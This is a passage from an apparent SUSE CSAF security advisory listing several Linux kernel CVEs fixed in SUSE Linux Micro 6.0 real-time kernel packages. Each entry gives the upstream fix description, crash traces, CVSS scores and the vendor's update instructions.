__mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: imx_sc_key - fix memory corruption on unload\n\nThis is supposed to be \"priv\" but we accidentally pass \"\u0026priv\" which is\nan address in the stack and so it will lead to memory corruption when\nthe imx_sc_key_action() function is called. Remove the \u0026.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40262",
"url": "https://www.suse.com/security/cve/CVE-2025-40262"
},
{
"category": "external",
"summary": "SUSE Bug 1254840 for CVE-2025-40262",
"url": "https://bugzilla.suse.com/1254840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40262"
},
{
"cve": "CVE-2025-40263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: cros_ec_keyb - fix an invalid memory access\n\nIf cros_ec_keyb_register_matrix() isn\u0027t called (due to\n`buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-\u003eidev` remains\nNULL. An invalid memory access is observed in cros_ec_keyb_process()\nwhen receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work()\nin such case.\n\n Unable to handle kernel read from unreadable memory at virtual address 0000000000000028\n ...\n x3 : 0000000000000000 x2 : 0000000000000000\n x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n input_event\n cros_ec_keyb_work\n blocking_notifier_call_chain\n ec_irq_thread\n\nIt\u0027s still unknown about why the kernel receives such malformed event,\nin any cases, the kernel shouldn\u0027t access `ckdev-\u003eidev` and friends if\nthe driver doesn\u0027t intend to initialize them.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40263",
"url": "https://www.suse.com/security/cve/CVE-2025-40263"
},
{
"category": "external",
"summary": "SUSE Bug 1255077 for CVE-2025-40263",
"url": "https://bugzilla.suse.com/1255077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40263"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40268",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40268"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: client: fix memory leak in smb3_fs_context_parse_param\n\nThe user calls fsconfig twice, but when the program exits, free() only\nfrees ctx-\u003esource for the second fsconfig, not the first.\nRegarding fc-\u003esource, there is no code in the fs context related to its\nmemory reclamation.\n\nTo fix this memory leak, release the source memory corresponding to ctx\nor fc before each parsing.\n\nsyzbot reported:\nBUG: memory leak\nunreferenced object 0xffff888128afa360 (size 96):\n backtrace (crc 79c9c7ba):\n kstrdup+0x3c/0x80 mm/util.c:84\n smb3_fs_context_parse_param+0x229b/0x36c0 fs/smb/client/fs_context.c:1444\n\nBUG: memory leak\nunreferenced object 0xffff888112c7d900 (size 96):\n backtrace (crc 79c9c7ba):\n smb3_fs_context_fullpath+0x70/0x1b0 fs/smb/client/fs_context.c:629\n smb3_fs_context_parse_param+0x2266/0x36c0 fs/smb/client/fs_context.c:1438",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40268",
"url": "https://www.suse.com/security/cve/CVE-2025-40268"
},
{
"category": "external",
"summary": "SUSE Bug 1255082 for CVE-2025-40268",
"url": "https://bugzilla.suse.com/1255082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40268"
},
{
"cve": "CVE-2025-40269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40269"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential overflow of PCM transfer buffer\n\nThe PCM stream data in USB-audio driver is transferred over USB URB\npacket buffers, and each packet size is determined dynamically. The\npacket sizes are limited by some factors such as wMaxPacketSize USB\ndescriptor. OTOH, in the current code, the actually used packet sizes\nare determined only by the rate and the PPS, which may be bigger than\nthe size limit above. This results in a buffer overflow, as reported\nby syzbot.\n\nBasically when the limit is smaller than the calculated packet size,\nit implies that something is wrong, most likely a weird USB\ndescriptor. So the best option would be just to return an error at\nthe parameter setup time before doing any further operations.\n\nThis patch introduces such a sanity check, and returns -EINVAL when\nthe packet size is greater than maxpacksize. The comparison with\nep-\u003epacksize[1] alone should suffice since it\u0027s always equal or\ngreater than ep-\u003epacksize[0].",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40269",
"url": "https://www.suse.com/security/cve/CVE-2025-40269"
},
{
"category": "external",
"summary": "SUSE Bug 1255035 for CVE-2025-40269",
"url": "https://bugzilla.suse.com/1255035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40269"
},
{
"cve": "CVE-2025-40271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40271"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/proc: fix uaf in proc_readdir_de()\n\nPde is erased from subdir rbtree through rb_erase(), but not set the node\nto EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE()\nset the erased node to EMPTY, then pde_subdir_next() will return NULL to\navoid uaf access.\n\nWe found an uaf issue while using stress-ng testing, need to run testcase\ngetdent and tun in the same time. The steps of the issue is as follows:\n\n1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current\n pde is tun3;\n\n2) in the [time windows] unregister netdevice tun3 and tun2, and erase\n them from rbtree. erase tun3 first, and then erase tun2. the\n pde(tun2) will be released to slab;\n\n3) continue to getdent process, then pde_subdir_next() will return\n pde(tun2) which is released, it will case uaf access.\n\nCPU 0 | CPU 1\n-------------------------------------------------------------------------\ntraverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-\u003edev) //tun3 tun2\nsys_getdents64() |\n iterate_dir() |\n proc_readdir() |\n proc_readdir_de() | snmp6_unregister_dev()\n pde_get(de); | proc_remove()\n 